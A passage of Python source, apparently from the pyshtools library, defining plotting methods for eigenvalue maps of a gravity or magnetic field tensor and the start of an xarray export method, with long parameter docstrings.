if cb_label is None:
cb_label = self._eig2_label
        if self.eig1 is None:
            # compute_eig() fills eig1, eig2 and eig3 in a single pass.
            self.compute_eig()
return self.eig2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_eig3(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None, cb_tick_interval=None,
grid=False, axes_labelsize=None, tick_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, show=True, ax=None,
fname=None):
"""
Plot the third eigenvalue of the tensor.
Usage
-----
x.plot_eig3([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize, tick_labelsize,
ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_3$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eig3_label
        if self.eig1 is None:
            # compute_eig() fills eig1, eig2 and eig3 in a single pass.
            self.compute_eig()
return self.eig3.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_eigs(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
Plot the three eigenvalues of the tensor.
Usage
-----
x.plot_eigs([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
        if colorbar is not None:
            # Scale the figure height for the colorbar placement: maps with
            # horizontal colorbars need a taller figure than vertical ones.
            if colorbar in ('bottom', 'top'):
                scale = 2.3
            else:
                scale = 1.4
        else:
            scale = 1.65
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(3, 1, figsize=figsize)
self.plot_eig1(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eig2(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eig3(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
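    # Sketch: for Driscoll and Healy sampled grids the maps accept a Cartopy
    # projection instance; Mollweide is an arbitrary choice here.
    #
    #     import cartopy.crs as ccrs
    #     proj = ccrs.Mollweide(central_longitude=180.)
    #     fig, ax = tensor.plot_eigs(projection=proj, show=False)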

    def plot_eigh1(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
Plot the first eigenvalue of the horizontal tensor.
Usage
-----
x.plot_eigh1([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{h1}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eigh1_label
if self.eigh1 is None:
self.compute_eigh()
return self.eigh1.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_eigh2(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
Plot the second eigenvalue of the horizontal tensor.
Usage
-----
x.plot_eigh2([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{h2}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eigh2_label
        if self.eigh1 is None:
            # compute_eigh() fills eigh1, eigh2 and eighh in a single pass.
            self.compute_eigh()
return self.eigh2.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_eighh(self, projection=None, tick_interval=[30, 30],
minor_tick_interval=[None, None], xlabel=None, ylabel=None,
title=None, titlesize=None, colorbar='right',
cmap='viridis', cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=None,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=None,
show=True, ax=None, fname=None):
"""
        Plot the horizontal-tensor eigenvalue with the largest absolute value.
Usage
-----
x.plot_eighh([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, title, colorbar, cmap, cmap_limits,
cmap_reverse, cb_triangles, cb_label, cb_ylabel,
cb_tick_interval, cb_minor_tick_interval, cb_offset,
cb_width, grid, titlesize, axes_labelsize,
tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [None, None]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = 'longitude'
Label for the longitude axis.
ylabel : str, optional, default = 'latitude'
Label for the latitude axis.
title : str or list, optional, default = None
The title of the plot.
colorbar : str, optional, default = 'right'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = '$\lambda_{hh}$'
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
titlesize : int, optional, default = None
The font size of the title.
axes_labelsize : int, optional, default = None
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = None
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
if cb_label is None:
cb_label = self._eighh_label
        if self.eigh1 is None:
            # compute_eigh() fills eigh1, eigh2 and eighh in a single pass.
            self.compute_eigh()
return self.eighh.plot(projection=projection,
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, title=title,
titlesize=titlesize, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_offset=cb_offset,
cb_triangles=cb_triangles, cb_label=cb_label,
cb_tick_interval=cb_tick_interval, grid=grid,
axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks,
cb_width=cb_width,
cb_minor_tick_interval=cb_minor_tick_interval,
tick_labelsize=tick_labelsize, ax=ax,
show=show, fname=fname)

    def plot_eigh(self, projection=None, tick_interval=[60, 60],
minor_tick_interval=[30, 30], xlabel='',
ylabel='', colorbar='bottom', cmap='viridis',
cmap_limits=None, cmap_reverse=False,
cb_triangles='neither', cb_label=None,
cb_tick_interval=None, grid=False, axes_labelsize=9,
cb_minor_tick_interval=None, ticks='WSen', cb_ylabel=None,
cb_offset=None, cb_width=None, tick_labelsize=8, show=True,
ax=None, fname=None):
"""
        Plot the two eigenvalues of the horizontal tensor, together with the
        eigenvalue having the largest absolute value.
Usage
-----
x.plot_eigh([projection, tick_interval, minor_tick_interval, ticks,
xlabel, ylabel, colorbar, cmap, cmap_limits, cmap_reverse,
cb_triangles, cb_label, cb_ylabel, cb_tick_interval,
cb_minor_tick_interval, cb_offset, cb_width, grid,
axes_labelsize, tick_labelsize, ax, show, fname])
Parameters
----------
projection : Cartopy projection class, optional, default = None
The Cartopy projection class used to project the gridded data,
for Driscoll and Healy sampled grids only.
tick_interval : list or tuple, optional, default = [60, 60]
Intervals to use when plotting the x and y ticks. If set to None,
ticks will not be plotted.
minor_tick_interval : list or tuple, optional, default = [30, 30]
Intervals to use when plotting the minor x and y ticks. If set to
None, minor ticks will not be plotted.
ticks : str, optional, default = 'WSen'
Specify which axes should have ticks drawn and annotated. Capital
letters plot the ticks and annotations, whereas small letters plot
only the ticks. 'W', 'S', 'E', and 'N' denote the west, south, east
and north boundaries of the plot.
xlabel : str, optional, default = ''
Label for the longitude axis.
ylabel : str, optional, default = ''
Label for the latitude axis.
colorbar : str, optional, default = 'bottom'
Plot a colorbar along the 'top', 'right', 'bottom', or 'left' axis.
cmap : str, optional, default = 'viridis'
The color map to use when plotting the data and colorbar.
cmap_limits : list, optional, default = [self.min(), self.max()]
Set the lower and upper limits of the data used by the colormap,
and optionally an interval for each color band. If the interval is
specified, the number of discrete colors will be
(cmap_limits[1]-cmap_limits[0])/cmap_limits[2].
cmap_reverse : bool, optional, default = False
Set to True to reverse the sense of the color progression in the
color table.
cb_triangles : str, optional, default = 'neither'
Add triangles to the edges of the colorbar for minimum and maximum
values. Can be 'neither', 'both', 'min', or 'max'.
cb_label : str, optional, default = None
Text label for the colorbar.
cb_ylabel : str, optional, default = None
            Text label for the y axis of the colorbar.
cb_tick_interval : float, optional, default = None
Colorbar major tick and annotation interval.
cb_minor_tick_interval : float, optional, default = None
Colorbar minor tick interval.
cb_offset : float or int, optional, default = None
Offset of the colorbar from the map edge in points. If None,
the offset will be calculated automatically.
cb_width : float, optional, default = None
Width of the colorbar in percent with respect to the width of the
respective image axis. Defaults are 2.5 and 5 for vertical and
horizontal colorbars, respectively.
grid : bool, optional, default = False
If True, plot major grid lines.
axes_labelsize : int, optional, default = 9
The font size for the x and y axes labels.
tick_labelsize : int, optional, default = 8
The font size for the x and y tick labels.
ax : matplotlib axes object, optional, default = None
A single matplotlib axes object where the plot will appear.
show : bool, optional, default = True
If True, plot the image to the screen.
fname : str, optional, default = None
            If present, and if ax is not specified, save the image to the
specified file.
"""
        if colorbar is not None:
            # Scale the figure height for the colorbar placement: maps with
            # horizontal colorbars need a taller figure than vertical ones.
            if colorbar in ('bottom', 'top'):
                scale = 2.3
            else:
                scale = 1.4
        else:
            scale = 1.65
figsize = (_mpl.rcParams['figure.figsize'][0],
_mpl.rcParams['figure.figsize'][0] * scale)
fig, ax = _plt.subplots(3, 1, figsize=figsize)
self.plot_eigh1(projection=projection, ax=ax.flat[0],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eigh2(projection=projection, ax=ax.flat[1],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
self.plot_eighh(projection=projection, ax=ax.flat[2],
tick_interval=tick_interval,
minor_tick_interval=minor_tick_interval,
xlabel=xlabel, ylabel=ylabel, colorbar=colorbar,
cmap=cmap, cmap_limits=cmap_limits,
cmap_reverse=cmap_reverse, cb_triangles=cb_triangles,
cb_label=cb_label, cb_tick_interval=cb_tick_interval,
grid=grid, axes_labelsize=axes_labelsize,
cb_ylabel=cb_ylabel, ticks=ticks, cb_offset=cb_offset,
cb_minor_tick_interval=cb_minor_tick_interval,
cb_width=cb_width, tick_labelsize=tick_labelsize,
show=show)
fig.tight_layout(pad=0.5)
if fname is not None:
fig.savefig(fname)
return fig, ax
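    # A minimal usage sketch for the method above (the file name is
    # hypothetical; assumes 'tensor' was returned by SHGravCoeffs.tensor()):
    #
    #     tensor.compute_eigh()
    #     fig, ax = tensor.plot_eigh(colorbar='bottom',
    #                                cb_label='Eigenvalue',
    #                                show=False, fname='eigh.png')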
def to_xarray(self, title='', description='',
comment='pyshtools grid'):
"""
Return all tensor gridded data as an xarray DataSet.
Usage
-----
x.to_xarray([title, description, comment])
Parameters
----------
title : str, optional, default = ''
Title of the dataset.
description : str, optional, default = ''
Description of the dataset ('Remark' in gmt grd files).
comment : str, optional, default = 'pyshtools grid'
Additional information about how the data were generated.
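        Example
        -------
        A hypothetical export to netCDF (the file name is illustrative;
        to_netcdf() is standard xarray):

        >>> ds = x.to_xarray(title='gravity tensor')
        >>> ds.to_netcdf('tensor.nc')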
"""
attrs = {'title': title,
'description': description,
'comment': comment,
'nlat': self.nlat,
'nlon': self.nlon,
'lmax': self.lmax,
'lmax_calc': self.lmax_calc,
'sampling': self.sampling,
'grid': self.grid,
'a': self.a,
'f': self.f,
'n': self.n,
'extend': repr(self.extend)
}
if isinstance(self, SHGravTensor):
attrs['gm'] = self.gm
if self.epoch is not None:
attrs['epoch'] = self.epoch
desc = 'gravity tensor component '
else:
if self.year is not None:
attrs['year'] = self.year
desc = 'magnetic field tensor component '
_vxx = self.vxx.to_xarray(title=desc+'(Vxx)', long_name='$V_{xx}$',
units=self._vii_units)
_vxy = self.vxy.to_xarray(title=desc+'(Vxy)', long_name='$V_{xy}$',
units=self._vii_units)
_vxz = self.vxz.to_xarray(title=desc+'(Vxz)', long_name='$V_{xz}$',
units=self._vii_units)
_vyx = self.vyx.to_xarray(title=desc+'(Vyx)', long_name='$V_{yx}$',
units=self._vii_units)
_vyy = self.vyy.to_xarray(title=desc+'(Vyy)', long_name='$V_{yy}$',
units=self._vii_units)
_vyz = self.vyz.to_xarray(title=desc+'(Vyz)', long_name='$V_{yz}$',
units=self._vii_units)
_vzx = self.vzx.to_xarray(title=desc+'(Vzx)', long_name='$V_{zx}$',
units=self._vii_units)
_vzy = self.vzy.to_xarray(title=desc+'(Vzy)', long_name='$V_{zy}$',
units=self._vii_units)
_vzz = self.vzz.to_xarray(title=desc+'(Vzz)', long_name='$V_{zz}$',
units=self._vii_units)
dataset = _xr.Dataset({'vxx': _vxx, 'vxy': _vxy, 'vxz': _vxz,
'vyx': _vyx, 'vyy': _vyy, 'vyz': _vyz,
'vzx': _vzx, 'vzy': _vzy, 'vzz': _vzz},
attrs=attrs)
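        # Derived grids are appended below only when the corresponding
        # compute_invar(), compute_eig() or compute_eigh() call has
        # populated them.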
if self.i0 is not None:
if isinstance(self, SHGravTensor):
desc0 = 'First invariant of the gravity tensor'
desc1 = 'Second invariant of the gravity tensor'
desc2 = 'Third invariant of the gravity tensor'
desc = 'Unitless invariant of the gravity tensor'
else:
desc0 = 'First invariant of the magnetic field tensor'
